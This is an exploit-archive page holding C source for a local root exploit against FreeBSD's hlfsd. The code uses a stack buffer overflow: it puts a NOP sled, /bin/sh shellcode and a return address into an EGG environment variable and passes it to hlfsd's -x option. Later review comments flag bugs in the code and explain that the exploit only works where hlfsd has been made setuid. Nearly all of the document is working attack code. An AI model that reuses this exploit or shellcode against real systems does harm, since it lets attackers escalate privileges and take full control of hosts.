
hlfsd-xp.c

hlfsd-xp.c
Posted Dec 3, 2002
Authored by Rooterx

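Local exploit for hlfsd, tested on FreeBSD 4.6-STABLE and 4.7-RELEASE. hlfsd is not installed SUID by default, so privilege escalation is possible only on systems where the setuid bit has been added to the binary.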

tags | exploit, local
systems | freebsd
SHA-256 | ec0c364ca5a80087101a5cb10e3a7355c48c4a10f37fb0d2ec5b278420d7a08a

hlfsd-xp.c

Hi Packetstormsecurity guys.

/*
* hlfsd-xp.c
* Local root exploit for hlfsd.
* 1) FreeBSD 4.7-RELEASE
* 2) FreeBSD 4.6-STABLE
* hlfsd not suid by default, but if... g0t r00t.
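* argv[1] - buffer size (def: 1000), argv[2] - offset (def: 0)
* NOTE(review): this line does not match the code below, where main() reads
* argv[1] as an index into targets[], the buffer size is fixed at
* DEFAULT_BUFFER_SIZE (1041) and the offset comes from targets[].pad.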
* Thanks to: thefate, v1pee, Billi_k1d, meff, lbyte,xaoc
* Fuckz to: S|{IF yestarday you hurt me bad, you think I'm worse than
* you are? fuck you then!
*
* r00terX, NERF gr0up. (c) 2002 <under@azerinet.com>, nerf.ru
* advisory by division7
*/

#include <stdio.h>
#include <unistd.h>
#include <stdlib.h>

#define NOP 0x90
#define DEFAULT_BUFFER_SIZE 1041

char freebsdshellcode[] ="\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f"
"\x62\x69\x6e\x89\xe3\x50\x53\x50\x54\x53"
"\xb0\x3b\x50\xcd\x80";

/*
 * Returns the current stack pointer; main() uses it as the base of the
 * address it writes across the buffer.
 * NOTE(review): there is no return statement. The value reaches the caller
 * only because the inline asm leaves %esp in %eax, the 32-bit x86 return
 * register. The C standard does not guarantee this (it depends on compiler
 * and optimisation level), and the register names tie the code to 32-bit x86.
 */
unsigned long get_sp(void) {
__asm__("movl %esp,%eax");
}

/* One row of the targets[] table that main() selects with argv[1]. */
struct TARGET {
char *type; /* human-readable label printed by main() and list_targets() */
char *shellcode; /* payload bytes that main() copies into the buffer */
int pad; /* subtracted from get_sp() to form the address main() writes */
};

/*
 * Supported targets, indexed by the number given as argv[1]. Both rows use
 * the same payload and differ only in pad. The all-NULL row is the sentinel
 * that ends the loop in list_targets(); it is not a selectable target.
 */
struct TARGET targets [] = {
{"Freebsd 4.6-STABLE -x86 shellcode",freebsdshellcode,120},
{"Freebsd 4.7-RELEASE -x86 shellcode",freebsdshellcode,0},
{NULL, NULL, 0}
};

/* Forward declaration: main() calls ussage() before its definition. The argument is the program name. */
void ussage (char *argv);

/*
 * Builds a 1041-byte environment string of the form
 * "EGG=" + NOP filler + payload + repeated address, exports it with putenv()
 * and runs /usr/sbin/hlfsd through system() with $EGG as the argument to -x.
 * The vulnerable code in hlfsd is not shown on this page; presumably it copies
 * the -x argument into a fixed-size stack buffer without a length check.
 *
 * Defender notes: the page states hlfsd is not SUID by default, so this only
 * yields elevated privileges where the setuid bit was added to
 * /usr/sbin/hlfsd; auditing for and clearing that bit removes the exposure.
 * A run leaves observable artifacts: an EGG environment variable holding a
 * long run of 0x90 bytes, and an hlfsd process started by a shell with an
 * oversized -x argument.
 *
 * NOTE(review): strlen() and memcpy() are used below but <string.h> is not
 * among the includes visible at the top of the file.
 */
int main(int argc, char **argv) {
char *buff, *ptr;
long *addr_ptr, addr;
int bsize=DEFAULT_BUFFER_SIZE;
int i;
int target;

/* ussage() ends in exit(0), so argv[1] exists when execution continues. */
if ((argc < 2))
ussage(argv[0]);
/* NOTE(review): target is never range-checked. Index 2 selects the NULL
 * sentinel row and any other value reads outside targets[]. */
target = atoi(argv[1]);

if(!(buff = malloc(bsize))) {
printf("Can\`t allocate memory.\n");
/* NOTE(review): an allocation failure exits with status 0 (success). */
exit(0);
}

/* Address to repeat through the buffer: this process's stack pointer minus the per-target pad. */
addr = get_sp() - targets[target].pad;

printf("Using target: %s\n", targets[target].type);
/* NOTE(review): addr is a long but is printed with %x (format/argument type mismatch). */
printf("Using address: 0x%x\n", addr);
printf("Using buffer size: %d\n", DEFAULT_BUFFER_SIZE);
printf("Using offset: %d\n", targets[target].pad);

/* Step 1: fill the whole buffer with copies of addr.
 * NOTE(review): with bsize = 1041 this loop runs 261 times; if long is 4 bytes
 * (as on the 32-bit x86 targets) it stores 1044 bytes into a 1041-byte
 * allocation. */
ptr = buff;
addr_ptr = (long *) ptr;
for(i=0; i<bsize; i+=4)
*(addr_ptr++) = addr;

/* Step 2: overwrite the first half of the buffer with NOP bytes. */
for(i=0;i < bsize/2;i++)
buff[i]=NOP;

/* Step 3: place the payload so that it straddles the midpoint of the buffer. */
ptr = buff+((bsize/2)-(strlen(targets[target].shellcode)/2));

/* strlen() is re-evaluated on every iteration; the payload has no NUL byte. */
for(i=0;i < strlen(targets[target].shellcode); i++)
*(ptr++) = targets[target].shellcode[i];
/* Step 4: terminate the string and turn it into an "EGG=..." environment entry. */
buff[bsize - 1] = '\0';
memcpy(buff,"EGG=",4);
/* putenv() keeps a pointer to buff instead of copying it, so buff is never freed. */
putenv(buff);
/* The shell started by system() expands $EGG into the -x argument of hlfsd. */
system("/usr/sbin/hlfsd -x $EGG");
}

/*
 * Writes one "<index>) - <label>" line to stderr for every row of targets[],
 * stopping at the row whose type pointer is NULL.
 */
void list_targets () {
    int idx = 0;

    while (targets[idx].type != NULL) {
        fprintf (stderr, "%d) - %s\n", idx, targets[idx].type);
        idx++;
    }
}

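/*
 * Prints the banner, the usage line and the target table, then exits.
 *
 * argv: the program name (main() passes argv[0]), not the argument vector.
 * Does not return: the function always ends in exit(0).
 */
void ussage (char *argv) {
    printf ("%s - hlfsd local exploit\n",argv);
    printf ("written by r00terX\n\n");
    /* The original supplied no argument for this %s, which is undefined
     * behaviour; the program name is passed as it is on the banner line. */
    printf ("Ussage %s <target type> \ntargets avalible:\n\n", argv);
    list_targets ();
    exit(0);
}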

